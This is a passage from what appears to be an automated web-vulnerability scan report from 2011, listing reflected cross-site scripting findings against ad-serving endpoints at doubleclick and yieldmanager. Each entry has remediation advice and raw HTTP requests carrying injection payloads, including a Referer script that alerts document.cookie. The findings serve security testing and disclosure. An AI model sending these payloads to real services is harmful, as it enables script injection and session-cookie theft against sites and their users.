2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQaf04c'-alert(1)-'43db30c6c8d&num=0&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg&client=ca-pub-6939975784505313&adurl=http://w.espn.go.com/espnw/?ex_cid=2011_bnnr_espw_mcaf_1axx_nbap \">
...[SNIP]...

3.17. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [client parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N763.metacafecom/B5470558.8

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload afef5"-alert(1)-"7664da328bf was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N763.metacafecom/B5470558.8;sz=300x250;pc=[TPAS_ID];click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BEqu0Wx3RTdKPFsqElgem0IXUAaPrkrcCAAAAEAEgADgAWLPuvJcmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg&client=ca-pub-6939975784505313afef5"-alert(1)-"7664da328bf&adurl=;ord=1792635571? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 12:50:38 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7551

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Apr 28 10:48:35 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg&client=ca-pub-6939975784505313afef5"-alert(1)-"7664da328bf&adurl=http://w.espn.go.com/espnw/?ex_cid=2011_bnnr_espw_mcaf_1bxx_pain");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";
...[SNIP]...

3.18. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [client parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N763.metacafecom/B5470558.8

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3386a'-alert(1)-'2f70b01d2c3 was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N763.metacafecom/B5470558.8;sz=300x250;pc=[TPAS_ID];click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BEqu0Wx3RTdKPFsqElgem0IXUAaPrkrcCAAAAEAEgADgAWLPuvJcmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg&client=ca-pub-69399757845053133386a'-alert(1)-'2f70b01d2c3&adurl=;ord=1792635571? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 12:50:43 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7548

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue May 03 11:33:15 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg&client=ca-pub-69399757845053133386a'-alert(1)-'2f70b01d2c3&adurl=http://w.espn.go.com/espnw/?ex_cid=2011_bnnr_espw_mcaf_1axx_line \">
...[SNIP]...

3.19. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [num parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N763.metacafecom/B5470558.8

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 58695"-alert(1)-"7594321f6a2 was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N763.metacafecom/B5470558.8;sz=300x250;pc=[TPAS_ID];click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BEqu0Wx3RTdKPFsqElgem0IXUAaPrkrcCAAAAEAEgADgAWLPuvJcmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=058695"-alert(1)-"7594321f6a2&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg&client=ca-pub-6939975784505313&adurl=;ord=1792635571? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 12:50:22 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7551

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Apr 28 10:48:35 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=058695"-alert(1)-"7594321f6a2&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg&client=ca-pub-6939975784505313&adurl=http://w.espn.go.com/espnw/?ex_cid=2011_bnnr_espw_mcaf_1bxx_pain");
var fscUrl = url;
var fscUrlClickTagFound = false;
va
...[SNIP]...

3.20. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [num parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N763.metacafecom/B5470558.8

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 64f52'-alert(1)-'352bb153013 was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N763.metacafecom/B5470558.8;sz=300x250;pc=[TPAS_ID];click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BEqu0Wx3RTdKPFsqElgem0IXUAaPrkrcCAAAAEAEgADgAWLPuvJcmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=064f52'-alert(1)-'352bb153013&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg&client=ca-pub-6939975784505313&adurl=;ord=1792635571? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 12:50:26 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7555

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu May 12 18:03:37 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=064f52'-alert(1)-'352bb153013&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg&client=ca-pub-6939975784505313&adurl=http://w.espn.go.com/espnw/?ex_cid=2011_bnnr_espw_mcaf_2bxx_good\">
...[SNIP]...

3.21. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [sig parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N763.metacafecom/B5470558.8

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8531a'-alert(1)-'f218f4a84b2 was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N763.metacafecom/B5470558.8;sz=300x250;pc=[TPAS_ID];click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BEqu0Wx3RTdKPFsqElgem0IXUAaPrkrcCAAAAEAEgADgAWLPuvJcmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg8531a'-alert(1)-'f218f4a84b2&client=ca-pub-6939975784505313&adurl=;ord=1792635571? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 12:50:34 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7543

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu May 12 17:46:05 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg8531a'-alert(1)-'f218f4a84b2&client=ca-pub-6939975784505313&adurl=http://w.espn.go.com/espnw/?ex_cid=2011_bnnr_espw_mcaf_1axx_nbap \">
...[SNIP]...

3.22. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [sig parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N763.metacafecom/B5470558.8

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 47335"-alert(1)-"dcf5d98505f was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N763.metacafecom/B5470558.8;sz=300x250;pc=[TPAS_ID];click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BEqu0Wx3RTdKPFsqElgem0IXUAaPrkrcCAAAAEAEgADgAWLPuvJcmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg47335"-alert(1)-"dcf5d98505f&client=ca-pub-6939975784505313&adurl=;ord=1792635571? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 12:50:30 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7543

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu May 12 17:46:05 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg47335"-alert(1)-"dcf5d98505f&client=ca-pub-6939975784505313&adurl=http://w.espn.go.com/espnw/?ex_cid=2011_bnnr_espw_mcaf_1axx_nbap ");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var
...[SNIP]...

3.23. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N763.metacafecom/B5470558.8

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d7e4e'-alert(1)-'6d5b409016 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N763.metacafecom/B5470558.8;sz=300x250;pc=[TPAS_ID];click=http://adclick.g.doubleclick.net/aclk?sa=Ld7e4e'-alert(1)-'6d5b409016&ai=BEqu0Wx3RTdKPFsqElgem0IXUAaPrkrcCAAAAEAEgADgAWLPuvJcmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg&client=ca-pub-6939975784505313&adurl=;ord=1792635571? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 12:50:09 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7547

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Apr 28 10:48:35 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
et/click%3Bh%3Dv8/3b09/f/20f/%2a/y%3B240312816%3B0-0%3B0%3B63191625%3B4307-300/250%3B41923894/41941681/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://adclick.g.doubleclick.net/aclk?sa=Ld7e4e'-alert(1)-'6d5b409016&ai=BEqu0Wx3RTdKPFsqElgem0IXUAaPrkrcCAAAAEAEgADgAWLPuvJcmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcw
...[SNIP]...

3.24. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N763.metacafecom/B5470558.8

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c14c"-alert(1)-"6086ad86766 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N763.metacafecom/B5470558.8;sz=300x250;pc=[TPAS_ID];click=http://adclick.g.doubleclick.net/aclk?sa=L1c14c"-alert(1)-"6086ad86766&ai=BEqu0Wx3RTdKPFsqElgem0IXUAaPrkrcCAAAAEAEgADgAWLPuvJcmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg&client=ca-pub-6939975784505313&adurl=;ord=1792635571? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 12:50:05 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7551

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Apr 28 10:48:35 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
et/click%3Bh%3Dv8/3b09/f/210/%2a/y%3B240312816%3B0-0%3B0%3B63191625%3B4307-300/250%3B41923894/41941681/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://adclick.g.doubleclick.net/aclk?sa=L1c14c"-alert(1)-"6086ad86766&ai=BEqu0Wx3RTdKPFsqElgem0IXUAaPrkrcCAAAAEAEgADgAWLPuvJcmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcw
...[SNIP]...

3.25. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31b6f"-alert(1)-"f1e62c14a44 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=ad&ad_size=728x90&section=1703625&31b6f"-alert(1)-"f1e62c14a44=1 HTTP/1.1
Host: ad.yieldmanager.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d.tradex.openx.com/afr.php?zoneid=4408&cb=INSERT_RANDOM_NUMBER_HERE
